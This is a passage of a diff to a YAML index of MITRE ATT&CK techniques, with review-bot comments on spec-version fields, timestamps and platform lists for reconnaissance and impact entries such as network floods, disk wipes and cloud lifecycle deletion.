url: https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.001:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
- type: attack-pattern
- created: '2020-10-02T16:54:23.193Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1595.001
- url: https://attack.mitre.org/techniques/T1595/001
- - source_name: Botnet Scan
- url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
- description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
- a Botnet. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T13:46:55.039Z'
name: Scanning IP Blocks
description: |-
Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
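Review bot: `spec_version: '2.1'` is removed from the object with no replacement, and the remaining T1595.001 keys (platforms, domains, object_marking_refs, id, type, created, external_references) are re-emitted in a different order further down, so almost all of this hunk is ordering noise around a one-line `modified` change. If the generator switched to emitting keys in upstream STIX order, say so in the commit message, and confirm that dropping the STIX `spec_version` marker is intended for every object rather than a side effect of the export; any consumer keyed on that field will stop seeing it.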
@@ -57053,19 +57718,41 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Diego Sappa, Securonix
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+ created: '2020-10-02T16:54:23.193Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1595/001
+ external_id: T1595.001
+ - source_name: Botnet Scan
+ description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+ a Botnet. Retrieved October 20, 2020.
+ url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1590.001:
technique:
@@ -57123,7 +57810,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596.005:
technique:
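Review bot: this object keeps `x_mitre_attack_spec_version: 2.1.0` after losing `spec_version`, while objects re-exported elsewhere in the patch carry 3.1.0 or 3.2.0, so the file now mixes three attack spec versions. That is consistent with mirroring upstream objects that have not been touched since, but any loader that asserts a single spec version across the whole index needs to be relaxed.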
@@ -57144,7 +57830,7 @@ reconnaissance:
- source_name: Shodan
url: https://shodan.io
description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:49:49.260Z'
name: Scan Databases
description: |-
Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
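Review bot: `modified` moves backwards here, from 2022-04-25T14:00:00.188Z to 2021-04-15T03:49:49.260Z. Every old stamp touched in this patch ends in the same `14:00:00.188Z` suffix, which looks like a release-level bulk timestamp rather than a per-object edit time, so the new value is probably the more accurate one; but anything that treats a changed `modified` as "technique updated" (changelogs, cache invalidation) will fire on these regressions too. The same backwards move recurs for T1591.001, T1598.001, T1491.002, T1499.001 and T1561 below, so one sentence in the commit message on where the new stamps come from would save the next reviewer the same question.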
@@ -57160,8 +57846,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.001:
technique:
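Review bot: both `spec_version` and `x_mitre_attack_spec_version` are removed from T1596.005 with nothing put back, so this object ends up with no spec marker at all, unlike T1595.001 above, which receives `x_mitre_attack_spec_version: 3.2.0`. If the generator only emits the field when the upstream object has it, fine, but check that the index loader treats a missing `x_mitre_attack_spec_version` as valid; T1591.001, T1598.001 and T1491.002 lose it the same way further down.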
@@ -57187,7 +57871,7 @@ reconnaissance:
url: https://www.sec.gov/edgar/search-and-access
description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-27T15:37:09.025Z'
name: Determine Physical Locations
description: |-
Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
@@ -57203,8 +57887,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.1'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598.001:
technique:
@@ -57228,7 +57910,7 @@ reconnaissance:
url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
Pad For Phishing Attacks. Retrieved October 20, 2020.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:43:12.843Z'
name: Spearphishing Service
description: |-
Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -57250,13 +57932,11 @@ reconnaissance:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
impact:
T1561.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:32:05.064Z'
name: Disk Structure Wipe
description: "Adversaries may corrupt or wipe the disk data structures on a
hard drive necessary to boot a system; targeting specific critical systems
@@ -57348,13 +58028,12 @@ impact:
url: https://www.symantec.com/connect/blogs/shamoon-attacks
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1498.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:54:49.943Z'
name: Direct Network Flood
description: |-
Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
@@ -57363,7 +58042,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_deprecated: false
x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
@@ -57380,17 +58058,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Sensor Health: Host Status'
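Review bot: T1498.001 drops Azure AD, Office 365, SaaS and Google Workspace from `x_mitre_platforms` with only a 1.3 to 1.4 version bump and no other visible change. Platform membership is what any per-platform view of this index is derived from, so those views need to be regenerated from the same export, or they will keep listing a Direct Network Flood entry for platforms the technique no longer claims.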
@@ -57415,7 +58088,8 @@ impact:
url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1491.002:
technique:
@@ -57453,7 +58127,7 @@ impact:
description: 'Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo
Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement:
How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-25T19:34:37.539Z'
name: External Defacement
description: 'An adversary may deface systems external to an organization in
an attempt to deliver messaging, intimidate, or otherwise mislead an organization
@@ -57487,12 +58161,10 @@ impact:
- 'Network Traffic: Network Traffic Content'
x_mitre_impact_type:
- Integrity
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1499.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:51.289Z'
name: OS Exhaustion Flood
description: |-
Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
@@ -57557,42 +58229,127 @@ impact:
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
- T1499.003:
+ T1485.001:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
+ modified: '2024-10-16T21:27:02.481Z'
+ name: Lifecycle-Triggered Deletion
+ description: "Adversaries may modify the lifecycle policies of a cloud storage
+ bucket to destroy all objects stored within. \n\nCloud storage buckets often
+ allow users to set lifecycle policies to automate the migration, archival,
+ or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation:
+ GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor
+ has sufficient permissions to modify these policies, they may be able to delete
+ all objects at once. \n\nFor example, in AWS environments, an adversary with
+ the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle`
+ API call to apply a lifecycle policy to an S3 bucket that deletes all objects
+ in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition
+ to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657),
+ adversaries may also perform this action on buckets storing cloud logs for
+ [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation:
+ Datadog S3 Lifecycle CloudTrail Logs)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Storage: Cloud Storage Modification'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--1001e0d6-ee09-4dfc-aa90-e9320ffc8fe4
+ created: '2024-09-25T13:16:14.166Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1485/001
+ external_id: T1485.001
+ - source_name: AWS Storage Lifecycles
+ description: AWS. (n.d.). Managing the lifecycle of objects. Retrieved September
+ 25, 2024.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html
+ - source_name: GCP Storage Lifecycles
+ description: Google Cloud. (n.d.). Object Lifecycle Management. Retrieved
+ September 25, 2024.
+ url: https://cloud.google.com/storage/docs/lifecycle
+ - source_name: Azure Storage Lifecycles
+ description: Microsoft Azure. (2024, July 3). Configure a lifecycle management
+ policy. Retrieved September 25, 2024.
+ url: https://learn.microsoft.com/en-us/azure/storage/blobs/lifecycle-management-policy-configure?tabs=azure-portal
+ - source_name: Palo Alto Cloud Ransomware
+ description: 'Ofir Balassiano and Ofir Shaty. (2023, November 29). Ransomware
+ in the Cloud: Breaking Down the Attack Vectors. Retrieved September 25,
+ 2024.'
+ url: https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/
+ - source_name: Datadog S3 Lifecycle CloudTrail Logs
+ description: Stratus Red Team. (n.d.). CloudTrail Logs Impairment Through
+ S3 Lifecycle Rule. Retrieved September 25, 2024.
+ url: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1496.003:
+ technique:
+ modified: '2024-10-16T17:45:14.210Z'
+ name: SMS Pumping
+ description: |-
+ Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
+
+ Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ x_mitre_impact_type:
+ - Availability
type: attack-pattern
- created: '2020-02-20T15:35:00.025Z'
+ id: attack-pattern--130d4494-b2d6-4040-bcea-6e59f05222fe
+ created: '2024-09-25T13:53:19.586Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1499.003
- url: https://attack.mitre.org/techniques/T1499/003
- - source_name: Arbor AnnualDoSreport Jan 2018
- url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
- description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
- Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
- into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
- Infrastructure Security Report. Retrieved April 22, 2019.
- - source_name: Cisco DoSdetectNetflow
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1496/003
+ external_id: T1496.003
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+ - source_name: Twilio SMS Pumping
+ description: Twilio. (2024, April 10). What Is SMS Pumping Fraud and How to
+ Stop It. Retrieved September 25, 2024.
+ url: https://www.twilio.com/en-us/blog/sms-pumping-fraud-solutions
+ - source_name: Twilio SMS Pumping Fraud
+ description: Twilio. (n.d.). What is SMS Pumping Fraud?. Retrieved September
+ 25, 2024.
+ url: https://www.twilio.com/docs/glossary/what-is-sms-pumping-fraud
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1499.003:
+ technique:
+ modified: '2024-10-15T15:41:49.168Z'
name: Application Exhaustion Flood
description: 'Adversaries may target resource intensive features of applications
to cause a denial of service (DoS), denying availability to those applications.
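Review bot: the two new sub-techniques T1485.001 (Lifecycle-Triggered Deletion) and T1496.003 (SMS Pumping) land with `x_mitre_detection: ''` and `atomic_tests: []`, so the only detection guidance they carry is their single data source line (`Cloud Storage: Cloud Storage Modification` and `Application Log: Application Log Content`); that mirrors upstream, but be aware the index advertises nothing actionable for them yet. Two smaller points: the apparent removal and re-addition of T1499.003 around them is ordering by STIX `id` (1001e0d6, 130d4494, 18cffc21), not a content change; and the T1485.001 text pairs the `PutLifecycleConfiguration` permission with the `PutBucketLifecycle` API call. The upstream wording is kept verbatim here, which is right for an index, but anyone writing an atomic for it should know that the current S3 operation is `PutBucketLifecycleConfiguration` (the IAM action is `s3:PutLifecycleConfiguration`), with `PutBucketLifecycle` being the legacy name.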
@@ -57603,13 +58360,20 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: |-
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
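Review bot: read on its own this hunk shows T1499.003 gaining four platforms (Windows, IaaS, Linux, macOS), but the preceding hunk removed its old eight-entry list, so the net effect is dropping Azure AD, Office 365, SaaS and Google Workspace, the same trim T1498.001 gets above. The 1.2 to 1.3 version bump matches that; just make sure anyone reviewing from the changelog sees it as a platform removal rather than an addition.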
@@ -57617,12 +58381,33 @@ impact:
- 'Application Log: Application Log Content'
x_mitre_impact_type:
- Availability
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+ created: '2020-02-20T15:35:00.025Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1499/003
+ external_id: T1499.003
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+ - source_name: Arbor AnnualDoSreport Jan 2018
+ description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
+ Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
+ into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
+ Infrastructure Security Report. Retrieved April 22, 2019.
+ url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1561:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-20T18:16:41.942Z'
name: Disk Wipe
description: |-
Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
@@ -57683,109 +58468,79 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1565.001:
technique:
+ modified: '2024-08-26T16:33:33.982Z'
+ name: Stored Data Manipulation
+ description: |-
+ Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+ Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: Where applicable, inspect important file hashes, locations,
+ and modifications for suspicious/unexpected values.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'File: File Modification'
+ - 'File: File Creation'
+ - 'File: File Deletion'
+ x_mitre_impact_type:
+ - Integrity
type: attack-pattern
id: attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292
created: '2020-03-02T14:22:24.410Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1565.001
url: https://attack.mitre.org/techniques/T1565/001
+ external_id: T1565.001
- source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
description: Department of Justice. (2018, September 6). Criminal Complaint
- United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
- source_name: FireEye APT38 Oct 2018
- url: https://content.fireeye.com/apt/rpt-apt38
description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
November 6, 2018.'
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
- Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Stored Data Manipulation
- x_mitre_detection: Where applicable, inspect important file hashes, locations,
- and modifications for suspicious/unexpected values.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'File: File Modification'
- - 'File: File Creation'
- - 'File: File Deletion'
- x_mitre_impact_type:
- - Integrity
- x_mitre_attack_spec_version: 2.1.0
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1489:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
- created: '2019-03-29T19:00:55.901Z'
- x_mitre_version: '1.2'
- external_references:
- - source_name: mitre-attack
- external_id: T1489
- url: https://attack.mitre.org/techniques/T1489
- - source_name: SecureWorks WannaCry Analysis
- url: https://www.secureworks.com/research/wcry-ransomware-analysis
- description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
- Analysis. Retrieved March 26, 2019.
- - source_name: Talos Olympic Destroyer 2018
- url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
- description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
- Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- - source_name: Novetta Blockbuster
- url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
- description: 'Novetta Threat Research Group. (2016, February 24). Operation
- Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
- 25, 2016.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-12T15:57:27.380Z'
+ name: Service Stop
description: "Adversaries may stop or disable services on a system to render
those services unavailable to legitimate users. Stopping critical services
or processes can inhibit or stop response to an incident or aid in the adversary's
overall objectives to cause damage to the environment.(Citation: Talos Olympic
Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish
this by disabling individual services of high importance to an organization,
- such as MSExchangeIS
, which will make Exchange content inaccessible
- (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
- many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+ such as MSExchangeIS
, which will make Exchange content inaccessible.(Citation:
+ Novetta Blockbuster) In some cases, adversaries may stop or disable many or
+ all services to render systems unusable.(Citation: Talos Olympic Destroyer
2018) Services or processes may not allow for modification of their data stores
while running. Adversaries may stop services or processes in order to conduct
[Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted
for Impact](https://attack.mitre.org/techniques/T1486) on the data stores
of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)"
- modified: '2022-11-08T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Service Stop
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
